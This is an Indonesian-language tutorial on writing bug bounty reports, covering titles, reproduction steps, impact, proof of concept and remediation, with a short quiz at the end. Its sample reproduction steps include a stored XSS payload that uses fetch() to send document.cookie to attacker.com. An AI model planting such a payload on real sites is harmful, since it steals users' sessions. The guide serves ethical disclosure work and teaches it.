Kenapa Report Penting?
Bug yang bagus tapi dilaporkan dengan buruk bisa berakhir ditolak, di-duplicate, atau mendapat reward jauh di bawah potensinya. Kemampuan menulis report adalah skill yang sama pentingnya dengan menemukan bug.
Struktur Report Ideal
1. Title — Judul yang Jelas & Impactful
❌ BURUK:
"XSS found"
"SQL injection in login"
✅ BAGUS:
"Stored XSS in user profile bio allows account takeover via session hijacking"
"Blind SQLi in /api/products?id= allows full database dump without authentication"
2. Summary
2–3 kalimat yang menjelaskan: apa bug-nya, di mana lokasinya, dan apa dampak terbesarnya. Bayangkan menjelaskan ke CEO yang tidak teknis.
3. Steps to Reproduce
Bagian paling kritis. Harus bisa diikuti oleh siapapun, langkah per langkah:
1. Login ke https://target.com dengan akun biasa (buat akun test jika diperlukan)
2. Pergi ke Settings → Edit Profile
3. Di field "Bio", masukkan payload berikut:
<img src=x onerror="fetch('https://attacker.com/?c='+document.cookie)">
4. Klik "Save Changes"
5. Logout, login sebagai user lain
6. Kunjungi profil publik akun pertama: https://target.com/u/testuser
7. Observe: request dikirim ke attacker.com dengan cookie session user yang melihat profil
4. Impact
Jelaskan secara konkret apa yang bisa dilakukan attacker nyata:
❌ BURUK:
"Attacker bisa melakukan XSS"
✅ BAGUS:
"Attacker dapat mencuri session cookie semua user yang mengunjungi profil,
mengambil alih akun mereka tanpa perlu password, dan melakukan
tindakan atas nama korban termasuk mengubah email, password, dan
mengakses data pribadi."
5. Proof of Concept (PoC)
- Screenshot setiap langkah kunci
- Video recording untuk bug yang kompleks (sangat direkomendasikan)
- Request/response dari Burp Suite
- Output dari tool jika menggunakan automated testing
6. Remediation (Opsional tapi Nilai Plus)
Sarankan cara perbaikan — menunjukkan kamu profesional:
Contoh untuk XSS:
"Encode semua user input sebelum ditampilkan menggunakan htmlspecialchars()
di PHP atau equivalent di framework yang digunakan. Implementasikan
Content-Security-Policy header yang ketat."
Do's & Don'ts
| DO ✓ | DON'T ✗ |
|---|
| Test di akun sendiri | Akses data user nyata |
| Lampirkan bukti yang clear | Melebih-lebihkan dampak |
| Tulis dalam bahasa Inggris (program internasional) | Submit laporan belum selesai |
| Satu bug per laporan | Mengancam atau mempublikasikan sebelum fixed |
| Beri waktu triager untuk respons | Spam follow-up setiap hari |
Tips pro: Baca report publik dari HackerOne Hacktivity untuk melihat format report yang diterima dan diapresiasi. Ini cara tercepat untuk belajar standar penulisan report yang baik.
// CEK PEMAHAMAN
Bagian mana dari bug report yang paling kritis untuk memastikan bug bisa direproduksi oleh triager?
ATitle
BSummary
CSteps to Reproduce
DCVSS Score